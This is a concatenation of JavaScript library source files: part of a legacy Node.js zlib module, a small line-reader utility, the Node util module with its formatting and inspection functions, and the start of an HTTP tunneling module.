  exports.codes[exports.codes[ckey]] = ckey;
}

exports.Deflate = Deflate;
exports.Inflate = Inflate;
exports.Gzip = Gzip;
exports.Gunzip = Gunzip;
exports.DeflateRaw = DeflateRaw;
exports.InflateRaw = InflateRaw;
exports.Unzip = Unzip;

exports.createDeflate = function(o) {
  return new Deflate(o);
};

exports.createInflate = function(o) {
  return new Inflate(o);
};

exports.createDeflateRaw = function(o) {
  return new DeflateRaw(o);
};

exports.createInflateRaw = function(o) {
  return new InflateRaw(o);
};

exports.createGzip = function(o) {
  return new Gzip(o);
};

exports.createGunzip = function(o) {
  return new Gunzip(o);
};

exports.createUnzip = function(o) {
  return new Unzip(o);
};




exports.deflate = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new Deflate(opts), buffer, callback);
};

exports.deflateSync = function(buffer, opts) {
  return zlibBufferSync(new Deflate(opts), buffer);
};

exports.gzip = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new Gzip(opts), buffer, callback);
};

exports.gzipSync = function(buffer, opts) {
  return zlibBufferSync(new Gzip(opts), buffer);
};

exports.deflateRaw = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new DeflateRaw(opts), buffer, callback);
};

exports.deflateRawSync = function(buffer, opts) {
  return zlibBufferSync(new DeflateRaw(opts), buffer);
};

exports.unzip = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new Unzip(opts), buffer, callback);
};

exports.unzipSync = function(buffer, opts) {
  return zlibBufferSync(new Unzip(opts), buffer);
};

exports.inflate = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new Inflate(opts), buffer, callback);
};

exports.inflateSync = function(buffer, opts) {
  return zlibBufferSync(new Inflate(opts), buffer);
};

exports.gunzip = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new Gunzip(opts), buffer, callback);
};

exports.gunzipSync = function(buffer, opts) {
  return zlibBufferSync(new Gunzip(opts), buffer);
};

exports.inflateRaw = function(buffer, opts, callback) {
  if (util.isFunction(opts)) {
    callback = opts;
    opts = {};
  }
  return zlibBuffer(new InflateRaw(opts), buffer, callback);
};

exports.inflateRawSync = function(buffer, opts) {
  return zlibBufferSync(new InflateRaw(opts), buffer);
};

function zlibBuffer(engine, buffer, callback) {
  var buffers = [];
  var nread = 0;

  engine.on('error', onError);
  engine.on('end', onEnd);

  engine.end(buffer);
  flow();

  function flow() {
    var chunk;
    while (null !== (chunk = engine.read())) {
      buffers.push(chunk);
      nread += chunk.length;
    }
    engine.once('readable', flow);
  }

  function onError(err) {
    engine.removeListener('end', onEnd);
    engine.removeListener('readable', flow);
    callback(err);
  }

  function onEnd() {
    var buf = Buffer.concat(buffers, nread);
    buffers = [];
    callback(null, buf);
    engine.close();
  }
}

function zlibBufferSync(engine, buffer) {
  if (util.isString(buffer))
    buffer = new Buffer(buffer);
  if (!util.isBuffer(buffer))
    throw new TypeError('Not a string or buffer');

  var flushFlag = binding.Z_FINISH;

  return engine._processChunk(buffer, flushFlag);
}



function Deflate(opts) {
  if (!(this instanceof Deflate)) return new Deflate(opts);
  Zlib.call(this, opts, binding.DEFLATE);
}

function Inflate(opts) {
  if (!(this instanceof Inflate)) return new Inflate(opts);
  Zlib.call(this, opts, binding.INFLATE);
}




function Gzip(opts) {
  if (!(this instanceof Gzip)) return new Gzip(opts);
  Zlib.call(this, opts, binding.GZIP);
}

function Gunzip(opts) {
  if (!(this instanceof Gunzip)) return new Gunzip(opts);
  Zlib.call(this, opts, binding.GUNZIP);
}




function DeflateRaw(opts) {
  if (!(this instanceof DeflateRaw)) return new DeflateRaw(opts);
  Zlib.call(this, opts, binding.DEFLATERAW);
}

function InflateRaw(opts) {
  if (!(this instanceof InflateRaw)) return new InflateRaw(opts);
  Zlib.call(this, opts, binding.INFLATERAW);
}



function Unzip(opts) {
  if (!(this instanceof Unzip)) return new Unzip(opts);
  Zlib.call(this, opts, binding.UNZIP);
}







function Zlib(opts, mode) {
  this._opts = opts = opts || {};
  this._chunkSize = opts.chunkSize || exports.Z_DEFAULT_CHUNK;

  Transform.call(this, opts);

  if (opts.flush) {
    if (opts.flush !== binding.Z_NO_FLUSH &&
        opts.flush !== binding.Z_PARTIAL_FLUSH &&
        opts.flush !== binding.Z_SYNC_FLUSH &&
        opts.flush !== binding.Z_FULL_FLUSH &&
        opts.flush !== binding.Z_FINISH &&
        opts.flush !== binding.Z_BLOCK) {
      throw new Error('Invalid flush flag: ' + opts.flush);
    }
  }
  this._flushFlag = opts.flush || binding.Z_NO_FLUSH;

  if (opts.chunkSize) {
    if (opts.chunkSize < exports.Z_MIN_CHUNK ||
        opts.chunkSize > exports.Z_MAX_CHUNK) {
      throw new Error('Invalid chunk size: ' + opts.chunkSize);
    }
  }

  if (opts.windowBits) {
    if (opts.windowBits < exports.Z_MIN_WINDOWBITS ||
        opts.windowBits > exports.Z_MAX_WINDOWBITS) {
      throw new Error('Invalid windowBits: ' + opts.windowBits);
    }
  }

  if (opts.level) {
    if (opts.level < exports.Z_MIN_LEVEL ||
        opts.level > exports.Z_MAX_LEVEL) {
      throw new Error('Invalid compression level: ' + opts.level);
    }
  }

  if (opts.memLevel) {
    if (opts.memLevel < exports.Z_MIN_MEMLEVEL ||
        opts.memLevel > exports.Z_MAX_MEMLEVEL) {
      throw new Error('Invalid memLevel: ' + opts.memLevel);
    }
  }

  if (opts.strategy) {
    if (opts.strategy != exports.Z_FILTERED &&
        opts.strategy != exports.Z_HUFFMAN_ONLY &&
        opts.strategy != exports.Z_RLE &&
        opts.strategy != exports.Z_FIXED &&
        opts.strategy != exports.Z_DEFAULT_STRATEGY) {
      throw new Error('Invalid strategy: ' + opts.strategy);
    }
  }

  if (opts.dictionary) {
    if (!util.isBuffer(opts.dictionary)) {
      throw new Error('Invalid dictionary: it should be a Buffer instance');
    }
  }

  this._handle = new binding.Zlib(mode);

  var self = this;
  this._hadError = false;
  this._handle.onerror = function(message, errno) {
    
    
    self._handle = null;
    self._hadError = true;

    var error = new Error(message);
    error.errno = errno;
    error.code = exports.codes[errno];
    self.emit('error', error);
  };

  var level = exports.Z_DEFAULT_COMPRESSION;
  if (util.isNumber(opts.level)) level = opts.level;

  var strategy = exports.Z_DEFAULT_STRATEGY;
  if (util.isNumber(opts.strategy)) strategy = opts.strategy;

  this._handle.init(opts.windowBits || exports.Z_DEFAULT_WINDOWBITS,
                    level,
                    opts.memLevel || exports.Z_DEFAULT_MEMLEVEL,
                    strategy,
                    opts.dictionary);

  this._buffer = new Buffer(this._chunkSize);
  this._offset = 0;
  this._closed = false;
  this._level = level;
  this._strategy = strategy;

  this.once('end', this.close);
}

util.inherits(Zlib, Transform);

Zlib.prototype.params = function(level, strategy, callback) {
  if (level < exports.Z_MIN_LEVEL ||
      level > exports.Z_MAX_LEVEL) {
    throw new RangeError('Invalid compression level: ' + level);
  }
  if (strategy != exports.Z_FILTERED &&
      strategy != exports.Z_HUFFMAN_ONLY &&
      strategy != exports.Z_RLE &&
      strategy != exports.Z_FIXED &&
      strategy != exports.Z_DEFAULT_STRATEGY) {
    throw new TypeError('Invalid strategy: ' + strategy);
  }

  if (this._level !== level || this._strategy !== strategy) {
    var self = this;
    this.flush(binding.Z_SYNC_FLUSH, function() {
      assert(!self._closed, 'zlib binding closed');
      self._handle.params(level, strategy);
      if (!self._hadError) {
        self._level = level;
        self._strategy = strategy;
        if (callback) callback();
      }
    });
  } else {
    process.nextTick(callback);
  }
};

Zlib.prototype.reset = function() {
  assert(!this._closed, 'zlib binding closed');
  return this._handle.reset();
};



Zlib.prototype._flush = function(callback) {
  this._transform(new Buffer(0), '', callback);
};

Zlib.prototype.flush = function(kind, callback) {
  var ws = this._writableState;

  if (util.isFunction(kind) || (util.isUndefined(kind) && !callback)) {
    callback = kind;
    kind = binding.Z_FULL_FLUSH;
  }

  if (ws.ended) {
    if (callback)
      process.nextTick(callback);
  } else if (ws.ending) {
    if (callback)
      this.once('end', callback);
  } else if (ws.needDrain) {
    var self = this;
    this.once('drain', function() {
      self.flush(callback);
    });
  } else {
    this._flushFlag = kind;
    this.write(new Buffer(0), '', callback);
  }
};

Zlib.prototype.close = function(callback) {
  if (callback)
    process.nextTick(callback);

  if (this._closed)
    return;

  this._closed = true;

  this._handle.close();

  var self = this;
  process.nextTick(function() {
    self.emit('close');
  });
};

Zlib.prototype._transform = function(chunk, encoding, cb) {
  var flushFlag;
  var ws = this._writableState;
  var ending = ws.ending || ws.ended;
  var last = ending && (!chunk || ws.length === chunk.length);

  if (!util.isNull(chunk) && !util.isBuffer(chunk))
    return cb(new Error('invalid input'));

  if (this._closed)
    return cb(new Error('zlib binding closed'));

  
  
  
  
  if (last)
    flushFlag = binding.Z_FINISH;
  else {
    flushFlag = this._flushFlag;
    
    
    if (chunk.length >= ws.length) {
      this._flushFlag = this._opts.flush || binding.Z_NO_FLUSH;
    }
  }

  this._processChunk(chunk, flushFlag, cb);
};

Zlib.prototype._processChunk = function(chunk, flushFlag, cb) {
  var availInBefore = chunk && chunk.length;
  var availOutBefore = this._chunkSize - this._offset;
  var inOff = 0;

  var self = this;

  var async = util.isFunction(cb);

  if (!async) {
    var buffers = [];
    var nread = 0;

    var error;
    this.on('error', function(er) {
      error = er;
    });

    assert(!this._closed, 'zlib binding closed');
    do {
      var res = this._handle.writeSync(flushFlag,
                                       chunk, 
                                       inOff, 
                                       availInBefore, 
                                       this._buffer, 
                                       this._offset, 
                                       availOutBefore); 
    } while (!this._hadError && callback(res[0], res[1]));

    if (this._hadError) {
      throw error;
    }

    var buf = Buffer.concat(buffers, nread);
    this.close();

    return buf;
  }

  assert(!this._closed, 'zlib binding closed');
  var req = this._handle.write(flushFlag,
                               chunk, 
                               inOff, 
                               availInBefore, 
                               this._buffer, 
                               this._offset, 
                               availOutBefore); 

  req.buffer = chunk;
  req.callback = callback;

  function callback(availInAfter, availOutAfter) {
    if (self._hadError)
      return;

    var have = availOutBefore - availOutAfter;
    assert(have >= 0, 'have should not go down');

    if (have > 0) {
      var out = self._buffer.slice(self._offset, self._offset + have);
      self._offset += have;
      
      if (async) {
        self.push(out);
      } else {
        buffers.push(out);
        nread += out.length;
      }
    }

    
    if (availOutAfter === 0 || self._offset >= self._chunkSize) {
      availOutBefore = self._chunkSize;
      self._offset = 0;
      self._buffer = new Buffer(self._chunkSize);
    }

    if (availOutAfter === 0) {
      
      
      
      
      inOff += (availInBefore - availInAfter);
      availInBefore = availInAfter;

      if (!async)
        return true;

      var newReq = self._handle.write(flushFlag,
                                      chunk,
                                      inOff,
                                      availInBefore,
                                      self._buffer,
                                      self._offset,
                                      self._chunkSize);
      newReq.callback = callback; 
      newReq.buffer = chunk;
      return;
    }

    if (!async)
      return false;

    
    cb();
  }
};

util.inherits(Deflate, Zlib);
util.inherits(Inflate, Zlib);
util.inherits(Gzip, Zlib);
util.inherits(Gunzip, Zlib);
util.inherits(DeflateRaw, Zlib);
util.inherits(InflateRaw, Zlib);
util.inherits(Unzip, Zlib);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

========

(function() {
  "use strict";

  var fs = require('fs'),
      StringDecoder = require('string_decoder').StringDecoder;

  function LineReader(fd, cb, separator, encoding, bufferSize) {
    var filePosition   = 0,
        encoding       = encoding || 'utf8',
        separator      = separator || '\n',
        bufferSize     = bufferSize || 1024,
        buffer         = new Buffer(bufferSize),
        bufferStr      = '',
        decoder        = new StringDecoder(encoding),
        closed         = false,
        eof            = false,
        separatorIndex = -1;

    function close() {
      if (!closed) {
        fs.close(fd, function(err) {
          if (err) {
            throw err;
          }
        });
        closed = true;
      }
    }

    function readToSeparator(cb) {
      function readChunk() {
        fs.read(fd, buffer, 0, bufferSize, filePosition, function(err, bytesRead) {
          var separatorAtEnd;

          if (err) {
            throw err;
          }

          if (bytesRead < bufferSize) {
            eof = true;
            close();
          }

          filePosition += bytesRead;

          bufferStr += decoder.write(buffer.slice(0, bytesRead));

          if (separatorIndex < 0) {
            separatorIndex = bufferStr.indexOf(separator);
          }

          separatorAtEnd = separatorIndex === bufferStr.length - 1;
          if (bytesRead && (separatorIndex === -1 || separatorAtEnd) && !eof) {
            readChunk();
          } else {
            cb();
          }
        });
      }

      readChunk();
    }

    function hasNextLine() {
      return bufferStr.length > 0 || !eof;
    }

    function nextLine(cb) {
      function getLine() {
        var ret = bufferStr.substring(0, separatorIndex);

        bufferStr = bufferStr.substring(separatorIndex + 1);
        separatorIndex = -1;
        cb(ret);
      }

      if (separatorIndex < 0) {
        separatorIndex = bufferStr.indexOf(separator);
      }

      if (separatorIndex < 0) {
        if (eof) {
          if (hasNextLine()) {
            separatorIndex = bufferStr.length;
            getLine();
          } else {
            throw new Error('No more lines to read.');
          }
        } else {
          readToSeparator(getLine);
        }
      } else {
        getLine();
      }
    }

    this.hasNextLine = hasNextLine;
    this.nextLine = nextLine;
    this.close = close;

    readToSeparator(cb);
  }

  function open(filename, cb, separator, encoding, bufferSize) {
    fs.open(filename, 'r', parseInt('666', 8), function(err, fd) {
      var reader;
      if (err) {
        throw err;
      }

      reader = new LineReader(fd, function() {
        cb(reader);
      }, separator, encoding, bufferSize);
    });
  }

  function eachLine(filename, cb, separator, encoding, bufferSize) {
    var finalFn,
        asyncCb = cb.length == 3;

    function finish() {
      if (finalFn && typeof finalFn === 'function') {
        finalFn();
      }
    }

    open(filename, function(reader) {
      function newRead() {
        if (reader.hasNextLine()) {
          process.nextTick(readNext);
        } else {
          finish();
        }
      }

      function continueCb(continueReading) {
        if (continueReading !== false) {
          newRead();
        } else {
          finish();
        }
      }

      function readNext() {
        reader.nextLine(function(line) {
          var last = !reader.hasNextLine();

          if (asyncCb) {
            cb(line, last, continueCb);
          } else {
            if (cb(line, last) !== false) {
              newRead();
            } else {
              finish();
            }
          }
        });
      }

      newRead();
    }, separator, encoding, bufferSize);

    return {
      then: function(cb) {
        finalFn = cb;
      }
    };
  }

  module.exports.open = open;
  module.exports.eachLine = eachLine;
}());

========






















var formatRegExp = /%[sdj%]/g;
exports.format = function(f) {
  if (!isString(f)) {
    var objects = [];
    for (var i = 0; i < arguments.length; i++) {
      objects.push(inspect(arguments[i]));
    }
    return objects.join(' ');
  }

  var i = 1;
  var args = arguments;
  var len = args.length;
  var str = String(f).replace(formatRegExp, function(x) {
    if (x === '%%') return '%';
    if (i >= len) return x;
    switch (x) {
      case '%s': return String(args[i++]);
      case '%d': return Number(args[i++]);
      case '%j':
        try {
          return JSON.stringify(args[i++]);
        } catch (_) {
          return '[Circular]';
        }
      default:
        return x;
    }
  });
  for (var x = args[i]; i < len; x = args[++i]) {
    if (isNull(x) || !isObject(x)) {
      str += ' ' + x;
    } else {
      str += ' ' + inspect(x);
    }
  }
  return str;
};





exports.deprecate = function(fn, msg) {
  
  if (isUndefined(global.process)) {
    return function() {
      return exports.deprecate(fn, msg).apply(this, arguments);
    };
  }

  if (process.noDeprecation === true) {
    return fn;
  }

  var warned = false;
  function deprecated() {
    if (!warned) {
      if (process.throwDeprecation) {
        throw new Error(msg);
      } else if (process.traceDeprecation) {
        console.trace(msg);
      } else {
        console.error(msg);
      }
      warned = true;
    }
    return fn.apply(this, arguments);
  }

  return deprecated;
};


var debugs = {};
var debugEnviron;
exports.debuglog = function(set) {
  if (isUndefined(debugEnviron))
    debugEnviron = process.env.NODE_DEBUG || '';
  set = set.toUpperCase();
  if (!debugs[set]) {
    if (new RegExp('\\b' + set + '\\b', 'i').test(debugEnviron)) {
      var pid = process.pid;
      debugs[set] = function() {
        var msg = exports.format.apply(exports, arguments);
        console.error('%s %d: %s', set, pid, msg);
      };
    } else {
      debugs[set] = function() {};
    }
  }
  return debugs[set];
};




function inspect(obj, opts) {
  
  var ctx = {
    seen: [],
    stylize: stylizeNoColor
  };
  
  if (arguments.length >= 3) ctx.depth = arguments[2];
  if (arguments.length >= 4) ctx.colors = arguments[3];
  if (isBoolean(opts)) {
    
    ctx.showHidden = opts;
  } else if (opts) {
    
    exports._extend(ctx, opts);
  }
  
  if (isUndefined(ctx.showHidden)) ctx.showHidden = false;
  if (isUndefined(ctx.depth)) ctx.depth = 2;
  if (isUndefined(ctx.colors)) ctx.colors = false;
  if (isUndefined(ctx.customInspect)) ctx.customInspect = true;
  if (ctx.colors) ctx.stylize = stylizeWithColor;
  return formatValue(ctx, obj, ctx.depth);
}
exports.inspect = inspect;



inspect.colors = {
  'bold' : [1, 22],
  'italic' : [3, 23],
  'underline' : [4, 24],
  'inverse' : [7, 27],
  'white' : [37, 39],
  'grey' : [90, 39],
  'black' : [30, 39],
  'blue' : [34, 39],
  'cyan' : [36, 39],
  'green' : [32, 39],
  'magenta' : [35, 39],
  'red' : [31, 39],
  'yellow' : [33, 39]
};


inspect.styles = {
  'special': 'cyan',
  'number': 'yellow',
  'boolean': 'yellow',
  'undefined': 'grey',
  'null': 'bold',
  'string': 'green',
  'date': 'magenta',
  
  'regexp': 'red'
};


function stylizeWithColor(str, styleType) {
  var style = inspect.styles[styleType];

  if (style) {
    return '\u001b[' + inspect.colors[style][0] + 'm' + str +
           '\u001b[' + inspect.colors[style][1] + 'm';
  } else {
    return str;
  }
}


function stylizeNoColor(str, styleType) {
  return str;
}


function arrayToHash(array) {
  var hash = {};

  array.forEach(function(val, idx) {
    hash[val] = true;
  });

  return hash;
}


function formatValue(ctx, value, recurseTimes) {
  
  
  if (ctx.customInspect &&
      value &&
      isFunction(value.inspect) &&
      
      value.inspect !== exports.inspect &&
      
      !(value.constructor && value.constructor.prototype === value)) {
    var ret = value.inspect(recurseTimes, ctx);
    if (!isString(ret)) {
      ret = formatValue(ctx, ret, recurseTimes);
    }
    return ret;
  }

  
  var primitive = formatPrimitive(ctx, value);
  if (primitive) {
    return primitive;
  }

  
  var keys = Object.keys(value);
  var visibleKeys = arrayToHash(keys);

  if (ctx.showHidden) {
    keys = Object.getOwnPropertyNames(value);
  }

  
  
  
  
  var formatted;
  var raw = value;
  try {
    
    if (!isDate(value))
      raw = value.valueOf();
  } catch (e) {
    
  }

  if (isString(raw)) {
    
    
    keys = keys.filter(function(key) {
      return !(key >= 0 && key < raw.length);
    });
  }

  
  if (keys.length === 0) {
    if (isFunction(value)) {
      var name = value.name ? ': ' + value.name : '';
      return ctx.stylize('[Function' + name + ']', 'special');
    }
    if (isRegExp(value)) {
      return ctx.stylize(RegExp.prototype.toString.call(value), 'regexp');
    }
    if (isDate(value)) {
      return ctx.stylize(Date.prototype.toString.call(value), 'date');
    }
    if (isError(value)) {
      return formatError(value);
    }
    
    if (isString(raw)) {
      formatted = formatPrimitiveNoColor(ctx, raw);
      return ctx.stylize('[String: ' + formatted + ']', 'string');
    }
    if (isNumber(raw)) {
      formatted = formatPrimitiveNoColor(ctx, raw);
      return ctx.stylize('[Number: ' + formatted + ']', 'number');
    }
    if (isBoolean(raw)) {
      formatted = formatPrimitiveNoColor(ctx, raw);
      return ctx.stylize('[Boolean: ' + formatted + ']', 'boolean');
    }
  }

  var base = '', array = false, braces = ['{', '}'];

  
  if (isArray(value)) {
    array = true;
    braces = ['[', ']'];
  }

  
  if (isFunction(value)) {
    var n = value.name ? ': ' + value.name : '';
    base = ' [Function' + n + ']';
  }

  
  if (isRegExp(value)) {
    base = ' ' + RegExp.prototype.toString.call(value);
  }

  
  if (isDate(value)) {
    base = ' ' + Date.prototype.toUTCString.call(value);
  }

  
  if (isError(value)) {
    base = ' ' + formatError(value);
  }

  
  if (isString(raw)) {
    formatted = formatPrimitiveNoColor(ctx, raw);
    base = ' ' + '[String: ' + formatted + ']';
  }

  
  if (isNumber(raw)) {
    formatted = formatPrimitiveNoColor(ctx, raw);
    base = ' ' + '[Number: ' + formatted + ']';
  }

  
  if (isBoolean(raw)) {
    formatted = formatPrimitiveNoColor(ctx, raw);
    base = ' ' + '[Boolean: ' + formatted + ']';
  }

  if (keys.length === 0 && (!array || value.length === 0)) {
    return braces[0] + base + braces[1];
  }

  if (recurseTimes < 0) {
    if (isRegExp(value)) {
      return ctx.stylize(RegExp.prototype.toString.call(value), 'regexp');
    } else {
      return ctx.stylize('[Object]', 'special');
    }
  }

  ctx.seen.push(value);

  var output;
  if (array) {
    output = formatArray(ctx, value, recurseTimes, visibleKeys, keys);
  } else {
    output = keys.map(function(key) {
      return formatProperty(ctx, value, recurseTimes, visibleKeys, key, array);
    });
  }

  ctx.seen.pop();

  return reduceToSingleString(output, base, braces);
}


function formatPrimitive(ctx, value) {
  if (isUndefined(value))
    return ctx.stylize('undefined', 'undefined');
  if (isString(value)) {
    var simple = '\'' + JSON.stringify(value).replace(/^"|"$/g, '')
                                             .replace(/'/g, "\\'")
                                             .replace(/\\"/g, '"') + '\'';
    return ctx.stylize(simple, 'string');
  }
  if (isNumber(value)) {
    
    
    if (value === 0 && 1 / value < 0)
      return ctx.stylize('-0', 'number');
    return ctx.stylize('' + value, 'number');
  }
  if (isBoolean(value))
    return ctx.stylize('' + value, 'boolean');
  // For some reason typeof null is "object", so special case here.
  if (isNull(value))
    return ctx.stylize('null', 'null');
}


function formatPrimitiveNoColor(ctx, value) {
  var stylize = ctx.stylize;
  ctx.stylize = stylizeNoColor;
  var str = formatPrimitive(ctx, value);
  ctx.stylize = stylize;
  return str;
}


function formatError(value) {
  return '[' + Error.prototype.toString.call(value) + ']';
}


function formatArray(ctx, value, recurseTimes, visibleKeys, keys) {
  var output = [];
  for (var i = 0, l = value.length; i < l; ++i) {
    if (hasOwnProperty(value, String(i))) {
      output.push(formatProperty(ctx, value, recurseTimes, visibleKeys,
          String(i), true));
    } else {
      output.push('');
    }
  }
  keys.forEach(function(key) {
    if (!key.match(/^\d+$/)) {
      output.push(formatProperty(ctx, value, recurseTimes, visibleKeys,
          key, true));
    }
  });
  return output;
}


function formatProperty(ctx, value, recurseTimes, visibleKeys, key, array) {
  var name, str, desc;
  desc = Object.getOwnPropertyDescriptor(value, key) || { value: value[key] };
  if (desc.get) {
    if (desc.set) {
      str = ctx.stylize('[Getter/Setter]', 'special');
    } else {
      str = ctx.stylize('[Getter]', 'special');
    }
  } else {
    if (desc.set) {
      str = ctx.stylize('[Setter]', 'special');
    }
  }
  if (!hasOwnProperty(visibleKeys, key)) {
    name = '[' + key + ']';
  }
  if (!str) {
    if (ctx.seen.indexOf(desc.value) < 0) {
      if (isNull(recurseTimes)) {
        str = formatValue(ctx, desc.value, null);
      } else {
        str = formatValue(ctx, desc.value, recurseTimes - 1);
      }
      if (str.indexOf('\n') > -1) {
        if (array) {
          str = str.split('\n').map(function(line) {
            return '  ' + line;
          }).join('\n').substr(2);
        } else {
          str = '\n' + str.split('\n').map(function(line) {
            return '   ' + line;
          }).join('\n');
        }
      }
    } else {
      str = ctx.stylize('[Circular]', 'special');
    }
  }
  if (isUndefined(name)) {
    if (array && key.match(/^\d+$/)) {
      return str;
    }
    name = JSON.stringify('' + key);
    if (name.match(/^"([a-zA-Z_][a-zA-Z_0-9]*)"$/)) {
      name = name.substr(1, name.length - 2);
      name = ctx.stylize(name, 'name');
    } else {
      name = name.replace(/'/g, "\\'")
                 .replace(/\\"/g, '"')
                 .replace(/(^"|"$)/g, "'")
                 .replace(/\\\\/g, '\\');
      name = ctx.stylize(name, 'string');
    }
  }

  return name + ': ' + str;
}


function reduceToSingleString(output, base, braces) {
  var length = output.reduce(function(prev, cur) {
    return prev + cur.replace(/\u001b\[\d\d?m/g, '').length + 1;
  }, 0);

  if (length > 60) {
    return braces[0] +
           (base === '' ? '' : base + '\n ') +
           ' ' +
           output.join(',\n  ') +
           ' ' +
           braces[1];
  }

  return braces[0] + base + ' ' + output.join(', ') + ' ' + braces[1];
}


// NOTE: These type checking functions intentionally don't use `instanceof`
// because it is fragile and can be easily faked with `Object.create()`.
var isArray = exports.isArray = Array.isArray;

function isBoolean(arg) {
  return typeof arg === 'boolean';
}
exports.isBoolean = isBoolean;

function isNull(arg) {
  return arg === null;
}
exports.isNull = isNull;

function isNullOrUndefined(arg) {
  return arg == null;
}
exports.isNullOrUndefined = isNullOrUndefined;

function isNumber(arg) {
  return typeof arg === 'number';
}
exports.isNumber = isNumber;

function isString(arg) {
  return typeof arg === 'string';
}
exports.isString = isString;

function isSymbol(arg) {
  return typeof arg === 'symbol';
}
exports.isSymbol = isSymbol;

function isUndefined(arg) {
  return arg === void 0;
}
exports.isUndefined = isUndefined;

function isRegExp(re) {
  return isObject(re) && objectToString(re) === '[object RegExp]';
}
exports.isRegExp = isRegExp;

function isObject(arg) {
  return typeof arg === 'object' && arg !== null;
}
exports.isObject = isObject;

function isDate(d) {
  return isObject(d) && objectToString(d) === '[object Date]';
}
exports.isDate = isDate;

function isError(e) {
  return isObject(e) &&
      (objectToString(e) === '[object Error]' || e instanceof Error);
}
exports.isError = isError;

function isFunction(arg) {
  return typeof arg === 'function';
}
exports.isFunction = isFunction;

function isPrimitive(arg) {
  return arg === null ||
         typeof arg === 'boolean' ||
         typeof arg === 'number' ||
         typeof arg === 'string' ||
         typeof arg === 'symbol' ||  // ES6 symbol
         typeof arg === 'undefined';
}
exports.isPrimitive = isPrimitive;

function isBuffer(arg) {
  return arg instanceof Buffer;
}
exports.isBuffer = isBuffer;

function objectToString(o) {
  return Object.prototype.toString.call(o);
}


function pad(n) {
  return n < 10 ? '0' + n.toString(10) : n.toString(10);
}


var months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep',
              'Oct', 'Nov', 'Dec'];

// 26 Feb 16:19:34
function timestamp() {
  var d = new Date();
  var time = [pad(d.getHours()),
              pad(d.getMinutes()),
              pad(d.getSeconds())].join(':');
  return [d.getDate(), months[d.getMonth()], time].join(' ');
}


// log is just a thin wrapper to console.log that prepends a timestamp
exports.log = function() {
  console.log('%s - %s', timestamp(), exports.format.apply(exports, arguments));
};


/**
 * Inherit the prototype methods from one constructor into another.
 *
 * The Function.prototype.inherits from lang.js rewritten as a standalone
 * function (not on Function.prototype). NOTE: If this file is to be loaded
 * during bootstrapping this function needs to be rewritten using some native
 * functions as prototype setup using normal JavaScript does not work as
 * expected during bootstrapping (see mirror.js in r114903).
 *
 * @param {function} ctor Constructor function which needs to inherit the
 *     prototype.
 * @param {function} superCtor Constructor function to inherit prototype from.
 */
exports.inherits = function(ctor, superCtor) {
  ctor.super_ = superCtor;
  ctor.prototype = Object.create(superCtor.prototype, {
    constructor: {
      value: ctor,
      enumerable: false,
      writable: true,
      configurable: true
    }
  });
};

exports._extend = function(origin, add) {
  // Don't do anything if add isn't an object
  if (!add || !isObject(add)) return origin;

  var keys = Object.keys(add);
  var i = keys.length;
  while (i--) {
    origin[keys[i]] = add[keys[i]];
  }
  return origin;
};

function hasOwnProperty(obj, prop) {
  return Object.prototype.hasOwnProperty.call(obj, prop);
}


// Deprecated old stuff.

exports.p = exports.deprecate(function() {
  for (var i = 0, len = arguments.length; i < len; ++i) {
    console.error(exports.inspect(arguments[i]));
  }
}, 'util.p: Use console.error() instead');


exports.exec = exports.deprecate(function() {
  return require('child_process').exec.apply(this, arguments);
}, 'util.exec is now called `child_process.exec`.');


exports.print = exports.deprecate(function() {
  for (var i = 0, len = arguments.length; i < len; ++i) {
    process.stdout.write(String(arguments[i]));
  }
}, 'util.print: Use console.log instead');


exports.puts = exports.deprecate(function() {
  for (var i = 0, len = arguments.length; i < len; ++i) {
    process.stdout.write(arguments[i] + '\n');
  }
}, 'util.puts: Use console.log instead');


exports.debug = exports.deprecate(function(x) {
  process.stderr.write('DEBUG: ' + x + '\n');
}, 'util.debug: Use console.error instead');


exports.error = exports.deprecate(function(x) {
  for (var i = 0, len = arguments.length; i < len; ++i) {
    process.stderr.write(arguments[i] + '\n');
  }
}, 'util.error: Use console.error instead');


exports.pump = exports.deprecate(function(readStream, writeStream, callback) {
  var callbackCalled = false;

  function call(a, b, c) {
    if (callback && !callbackCalled) {
      callback(a, b, c);
      callbackCalled = true;
    }
  }

  readStream.addListener('data', function(chunk) {
    if (writeStream.write(chunk) === false) readStream.pause();
  });

  writeStream.addListener('drain', function() {
    readStream.resume();
  });

  readStream.addListener('end', function() {
    writeStream.end();
  });

  readStream.addListener('close', function() {
    call();
  });

  readStream.addListener('error', function(err) {
    writeStream.end();
    call(err);
  });

  writeStream.addListener('error', function(err) {
    readStream.destroy();
    call(err);
  });
}, 'util.pump(): Use readableStream.pipe() instead');


var uv;
exports._errnoException = function(err, syscall, original) {
  if (isUndefined(uv)) uv = process.binding('uv');
  var errname = uv.errname(err);
  var message = syscall + ' ' + errname;
  if (original)
    message += ' ' + original;
  var e = new Error(message);
  e.code = errname;
  e.errno = errname;
  e.syscall = syscall;
  return e;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

========

'use strict';

var net = require('net');
var tls = require('tls');
var http = require('http');
var https = require('https');
var events = require('events');
var assert = require('assert');
var util = require('util');


exports.httpOverHttp = httpOverHttp;
